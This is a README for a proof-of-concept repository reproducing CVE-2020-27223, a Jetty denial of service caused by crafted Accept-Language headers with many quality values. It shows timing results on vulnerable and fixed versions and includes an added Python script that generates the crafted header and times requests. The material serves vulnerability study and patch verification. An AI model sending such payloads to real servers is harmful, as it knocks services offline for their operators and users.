# CVE-2020-27223 Vulnerability App & PoC

A minimal Spring Boot application with embedded Jetty, plus two scripts that reproduce CVE-2020-27223: a denial of service in Jetty's handling of quoted quality CSV headers (for example `Accept-Language` with many `q=` parameters), where parsing a single crafted request can keep the server busy for seconds to minutes. Affected versions and the fix are documented in the references below.

## Usage

Start the application (it embeds Jetty), then run the PoC script against it. Each run prints the application's JSON response, which reports the processing time measured by the application in nanoseconds (`time_ns`) and the `accept_language` value it echoes back, followed by the client-side `time` output. The first request carries a short header; the second carries many more quality values. Run the same script against the application built with a vulnerable Jetty and with the fixed one to compare.
```
$ mvn spring-boot:run
```
### 9.4.36.v20210114 (Vulnerable)
```
$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"58,557","accept_language":"aab"}
real 0m0.093s 🐇
user 0m0.006s
sys 0m0.007s
{"time_ns":"18,461,763,438","accept_language":"ahn"}
real 0m35.339s 🐢
user 0m0.006s
sys 0m0.006s
```

On the vulnerable version the second request takes about 35 seconds of wall-clock time, almost all of it inside Jetty: the client's own `user` and `sys` time is negligible, so the wait is server-side processing of the quality values.
### 9.4.37.v20210219 (Fixed)
```
$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"36,675","accept_language":"aab"}
real 0m0.023s 🐇
user 0m0.005s
sys 0m0.007s
{"time_ns":"1,265,004","accept_language":"ahn"}
real 0m0.024s 🐇
user 0m0.006s
sys 0m0.006s
```

With the fix, the same large header is processed in about a millisecond, and the small header is unchanged.
## PoC

The second script sends a larger header. Against a vulnerable Jetty the server does not answer within curl's 120-second limit, and the request thread is consuming CPU for the entire time, which is the denial-of-service condition:
```
$ ./poc/cve-2020-27223-poc2.sh
curl: (28) Operation timed out after 120000 milliseconds with 0 bytes received
real 2m0.025s
user 0m0.016s
sys 0m0.009s
```
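The scripts above are not shown on this page, so here is an added example (not part of this repository) of the same measurement: build an `Accept-Language` header carrying `n` quality values and time one request against the demo application. It assumes the application listens at `http://localhost:8080/` (a placeholder), that language tags are generated as `aaa`, `aab`, ... (the `aab` and `ahn` values in the responses above are consistent with that scheme, but it is an assumption), and that `q` increases along the list so that the highest-quality entry is the last one parsed.

```python
"""Added example, not the repository's poc1.sh/poc2.sh.

Assumptions (not stated on the page): endpoint URL, the aaa/aab/... tag
scheme, and ascending q values.
"""
import socket
import string
import time
import urllib.error
import urllib.request

LETTERS = string.ascii_lowercase


def lang_tag(index):
    """Three-letter tag for a zero-based index: 0 -> 'aaa', 1 -> 'aab', 195 -> 'ahn'."""
    if not 0 <= index < 26 ** 3:
        raise ValueError("index out of range for a three-letter tag")
    a, rest = divmod(index, 26 * 26)
    b, c = divmod(rest, 26)
    return LETTERS[a] + LETTERS[b] + LETTERS[c]


def build_accept_language(count):
    """Header value with `count` entries whose q rises to 1.000 at the end.

    q is written with three decimals, the precision allowed for quality
    values; for count > 1000 neighbouring entries share a q, which is fine
    because the load comes from the number of quality parameters.
    """
    if count < 1:
        raise ValueError("count must be >= 1")
    entries = []
    for i in range(count):
        q = (i + 1) / count
        entries.append(f"{lang_tag(i)};q={q:.3f}")
    return ",".join(entries)


def probe(url, count, timeout):
    """Send one GET with the crafted header; return (elapsed_seconds, outcome).

    A timeout or an HTTP error (e.g. 431 if the header exceeds the server's
    limit) is reported as the outcome instead of raising.
    """
    header = build_accept_language(count)
    req = urllib.request.Request(url, headers={"Accept-Language": header})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
        return time.monotonic() - start, body.strip()
    except (urllib.error.URLError, socket.timeout, TimeoutError) as exc:
        return time.monotonic() - start, f"no response: {exc}"


if __name__ == "__main__":
    URL = "http://localhost:8080/"  # placeholder: point at the demo app's endpoint
    # 2 and 196 entries end in "aab" and "ahn" under the assumed tag scheme,
    # matching the two responses shown in the README.
    for n in (2, 196):
        elapsed, outcome = probe(URL, n, timeout=120)
        print(f"{n:>5} entries: {elapsed:8.3f}s  {outcome[:80]}")
```

Compare the elapsed time for the two header sizes on the vulnerable and fixed builds; if the server answers `431` for the larger header, its request header size limit is lower than the header you are sending and the test is not exercising the parser at all.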
## References
- [DOS vulnerability for Quoted Quality CSV headers · Advisory · eclipse/jetty.project](https://github.com/eclipse/jetty.project/security/advisories/GHSA-m394-8rww-3jr7)
- [Merge pull request from GHSA-m394-8rww-3jr7 · eclipse/jetty.project@10e5317](https://github.com/eclipse/jetty.project/commit/10e531756b972162eed402c44d0244f7f6b85131)
## Repository layout

```
[4.0K] /data/pocs/c26d4a612f09a5f4397c8271fd6344a6390df627
├── [9.8K] mvnw
├── [6.5K] mvnw.cmd
├── [4.0K] poc
│   ├── [ 25K] cve-2020-27223-poc1.sh
│   └── [223K] cve-2020-27223-poc2.sh
├── [2.2K] pom.xml
├── [1.1K] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] com
        │       └── [4.0K] example
        │           └── [4.0K] cve_2020_27223
        │               ├── [4.0K] controller
        │               │   └── [ 923] SampleController.java
        │               └── [ 315] DemoApplication.java
        └── [4.0K] resources
            └── [  37] application.properties

9 directories, 9 files
```